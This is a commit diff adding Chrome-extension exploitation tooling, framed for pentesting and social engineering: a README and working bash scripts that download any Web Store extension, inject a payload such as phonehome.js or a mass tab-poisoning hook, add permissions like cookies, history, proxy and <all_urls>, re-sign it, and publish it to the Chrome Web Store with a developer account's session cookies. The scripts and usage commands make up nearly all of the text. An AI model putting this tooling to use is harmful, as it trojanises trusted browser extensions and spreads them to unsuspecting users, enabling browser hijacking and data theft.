added new files, readme and contact info

tools/chrome_extensions_exploitation/README.md

@@ -0,0 +1,87 @@
+Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.
+
+Authors:
+ 
+ - Krzysztof Kotowicz - @kkotowicz - [blog](http://blog.kotowicz.net)
+ - Michele '@antisnatchor' Orru
+
+
+Injector
+--------
+Bunch of scripts for injecting existing extensions with new code:
+Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx).
+
+Requirements:
+ 
+ - bash
+ - ruby
+ - zip (cmd line)
+ - curl (cmd line)
+ - Google Chrome (used in crx mode only)
+
+Usage:
+
+    # get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
+    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js
+
+    # Same, but pack into repacked.zip instead
+    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
+    
+    # Create new CRX with Google Chrome
+    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js
+
+    # Inject into existing CRX file
+    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js
+
+    # Add some permissions into manifest.json
+    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"
+    
+    # Add persistent content script file launching on every tab
+    $ echo 'console.log(location.href)' > cs.js
+    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
+
+For example - mass poisoning every tab with [mosquito](https://github.com/koto/mosquito):
+
+    # start mosquito server:
+    $ cd path/to/mosquito 
+    $ python mosquito/start.py 8082 4444 --http 8000
+
+    # generate mosquito hook:
+    # - visit http://localhost:8000/generate
+    # - save hook as cs.js
+
+    # inject mosquito dropper into extension:
+    $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js
+
+
+Webstore Uploader
+-----------------
+Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store
+
+Requirements: 
+
+ - ruby
+
+Usage:
+
+    # Preparation:
+
+    1. Create Chrome developer account
+    2. Login at https://chrome.google.com/webstore/developer/dashboard/
+    3. Pay your $5 one time fee (credit card needed)
+    4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file
+
+    # Get Chrome extension code
+    #  e.g. run Injector in zip mode:
+
+    $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
+
+    # (optional) - prepare screenshot / description file
+
+    # publish the extension right away
+    $ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png
+
+    # or just upload & save it:
+    $ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png
+
+    # you can access the extension from your developer dashboard

tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb

@@ -2,7 +2,7 @@
 # encoding: UTF-8
 
 # Authors:
-# Krzysztof Kotowicz - @kkotowicz
+# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net
 
 require 'rubygems'
 require 'json'

tools/chrome_extensions_exploitation/injector/config.ini

@@ -0,0 +1,9 @@
+#!/usr/bin/env bash
+
+# path to chrome binary
+CHROMEPATH="/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
+
+# Private key to sign repacked extensions with.
+# Leave empty to generate new file on every run.
+#PEM="/home/koto/dev/xsschef/tools/dev.pem"
+PEM=

tools/chrome_extensions_exploitation/injector/inject.rb

@@ -2,7 +2,7 @@
 # encoding: UTF-8
 
 # Authors:
-# Krzysztof Kotowicz - @kkotowicz
+# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net
 
 require_relative 'chrome_extension_toolkit.rb'
 

tools/chrome_extensions_exploitation/injector/repacker-crx.sh

@@ -0,0 +1,117 @@
+#!/usr/bin/env bash
+
+# Authors:
+# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net
+#
+# Unpacks a crx file, inject it with given payload, and, optionally
+# packs it into zip/crx file
+# see ../README.md
+
+DIR=$( cd "$( dirname "$0" )" && pwd )
+source $DIR/config.ini
+RUNDIR=`pwd`
+tempfoo=`basename $0`
+TMPDIR=`mktemp -d -t ${tempfoo}` || exit 1
+EXTDIR="$TMPDIR"
+
+INPUT_CRX=$1
+MODE=$2
+DESTINATION=$3
+JS_FILE=$4
+shift 4
+
+if [ ! -z "$1" ]; then # 5th param optional 
+    PERMISSIONS=$1
+    shift
+else
+    PERMISSIONS=""
+fi
+
+function help {
+    printf "Usage: %s: <input.crx> <mode> <destination> <inject-bg.js> [permissions] [file1 ... ] \n" $(basename $0) >&2
+    echo "         <input.crx> - original extension CRX file" >&2
+    echo "         <mode> - output mode (dir|zip|crx)" >&2
+    echo "         <destination> - directory or file path to write injected extension to (depending on <mode>)" >&2
+    echo "         <inject-bg.js> - script to inject into extension background" >&2
+    echo "         [permissions] - comma separated permissions requested by script (to add to manifest)">&2    
+    echo "         [file...] - additional files to add to extension" >&2
+    exit 2
+}
+
+if [[ $# -eq 0 ]] ; then
+    help
+fi
+
+if [ ! -f "${INPUT_CRX}" ]; then
+    bailout "No input CRX file! - ${INPUT_CRX}"
+fi
+
+if [ ! -f "${JS_FILE}" ]; then
+    bailout "No file to inject! - ${JS_FILE}"
+fi
+
+if [ -z "$DESTINATION" ] || [ -z "$MODE" ]; then
+    bailout "You must give mode and destination!"
+fi
+
+function cleanup {
+    rm -rf "$TMPDIR"
+}
+
+function bailout () {
+    echo "Error: $1" >&2
+    cleanup
+    exit 1
+}
+
+echo "Unpacking $INPUT_CRX to $EXTDIR..."
+# supress warning about extra prefix bytes
+unzip -qo "$INPUT_CRX" -d "$EXTDIR" 2>/dev/null
+echo "Injecting script $JS_FILE..."
+
+$DIR/inject.rb "$EXTDIR" "$PERMISSIONS" < $JS_FILE || bailout "Injection failed"
+
+# copy additional files
+for file in "$@"
+do
+    
+    if [ -f "$file" ]; then
+        echo "Adding $file..."
+        cp "$file" "$EXTDIR"
+    fi
+done
+
+echo "Mode: $MODE"
+
+case "$MODE" in
+    crx)
+        if [ ! -x "$CHROMEPATH" ]; then
+            bailout "You must set correct CHROMEPATH in tools/config.ini"
+        fi
+
+        echo "Signing $EXTDIR..."
+        "$CHROMEPATH" --pack-extension="$EXTDIR" --pack-extension-key="$PEM" --no-message-box
+        if (( $? )) ; then 
+            bailout "Signing in Chrome FAILED." 
+        fi
+
+        echo "Moving signed extension to $DESTINATION"
+        mv "`dirname "$EXTDIR"`/`basename "$EXTDIR"`.crx" "$DESTINATION"
+        ;;
+    zip)
+        echo "Zipping extension to $DESTINATION"
+        cd "$EXTDIR"
+        zip -r __tmp.zip .
+        cd -
+        mv "$EXTDIR/__tmp.zip" $DESTINATION
+        ;;
+    dir)
+        echo "Moving extension directory to $DESTINATION"
+        rm -r "$DESTINATION"
+        mv "$EXTDIR" "$DESTINATION"
+        ;;
+    *)
+        bailout "Unknown mode: $MODE"
+esac
+
+cleanup

tools/chrome_extensions_exploitation/injector/repacker-webstore.sh

@@ -0,0 +1,100 @@
+#!/usr/bin/env bash
+
+# Authors:
+# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net
+#
+# Downloads extension from Google Chrome Webstore, inject it with given payload, and, optionally
+# packs it into zip/crx file
+# see ../README.md
+
+RUNDIR=`pwd`
+DIR=$( cd "$( dirname "$0" )" && pwd )
+tempfoo=`basename $0`
+TMPDIR=`mktemp -d -t ${tempfoo}` || exit 1
+
+function help {
+    printf "Usage: %s: [-q] <extension_id> <mode> <destination> <inject-bg.js> [permissions] [file1 ...] \n" $(basename $0) >&2
+    echo "         -q : quiet, only repacked extension filename will be printed to stdout" >&2
+    echo "         <extension_id> - extension id from Chrome WebStore" >&2
+    echo "         <mode> - output mode (dir|zip|crx)" >&2
+    echo "         <destination> - directory or file path to write injected extension to (depending on <mode>)" >&2
+    echo "         <inject-bg.js> - script to inject into extension background" >&2
+    echo "         [permissions] - comma separated permissions requested by script (to add to manifest)">&2    
+    echo "         [file...] - additional files to add to extension" >&2    
+    exit 2
+}
+
+function cleanup {
+    rm -rf "$TMPDIR"
+    cd "$RUNDIR"
+}
+
+function bailout () {
+    echo "Error: $1" >&2
+    cleanup
+    exit 1
+}
+
+#Parsing command line parameters
+QUIET=
+PERMISSIONS="tabs,proxy,<all_urls>,history,cookies,management,plugins"
+
+while getopts 'qh' OPTION
+do
+    case $OPTION in
+    q)  QUIET="1"
+        ;;
+    h)  help
+        ;;
+    *)  help
+        ;;
+    esac
+done
+
+shift $(($OPTIND - 1))
+
+if [[ $# -eq 0 ]] ; then
+    help
+fi
+
+EXT_ID="$1"
+MODE="$2"
+DESTINATION="$3"
+JS_FILE="$4"
+PERMISSIONS="$5"
+shift 5
+
+if [ -z "$EXT_ID" ]; then
+    bailout "No extension ID!"
+fi
+
+if [ ! -f "${JS_FILE}" ]; then
+    bailout "No file to inject! - ${JS_FILE}"
+fi
+
+if [ -z "$DESTINATION" ] || [ -z "$MODE" ]; then
+    bailout "You must give mode and destination!"
+fi
+
+WEBSTORE_URL="https://clients2.google.com/service/update2/crx?response=redirect&x=id%3D${EXT_ID}%26lang%3Dpl%26uc"
+
+# offline test
+# cp tmp/adblock.crx "$TMPDIR/org.crx"
+
+if [ "$QUIET" ]; then
+    curl -L "$WEBSTORE_URL" -o "$TMPDIR/org.crx" --silent
+else
+    curl -L "$WEBSTORE_URL" -o "$TMPDIR/org.crx"
+fi
+
+if (( $? )) ; then 
+    bailout "CURL failed."
+fi
+
+if [ "$QUIET" ]; then
+    $DIR/repacker-crx.sh "$TMPDIR/org.crx" "$MODE" "$DESTINATION" "$JS_FILE" "$PERMISSIONS" $@ >/dev/null || bailout "Repacker failed"
+    echo -n $DESTINATION
+else
+    $DIR/repacker-crx.sh "$TMPDIR/org.crx" "$MODE" "$DESTINATION" "$JS_FILE" "$PERMISSIONS" $@ || bailout "Repacker failed"
+fi
+rm $TMPDIR/org.crx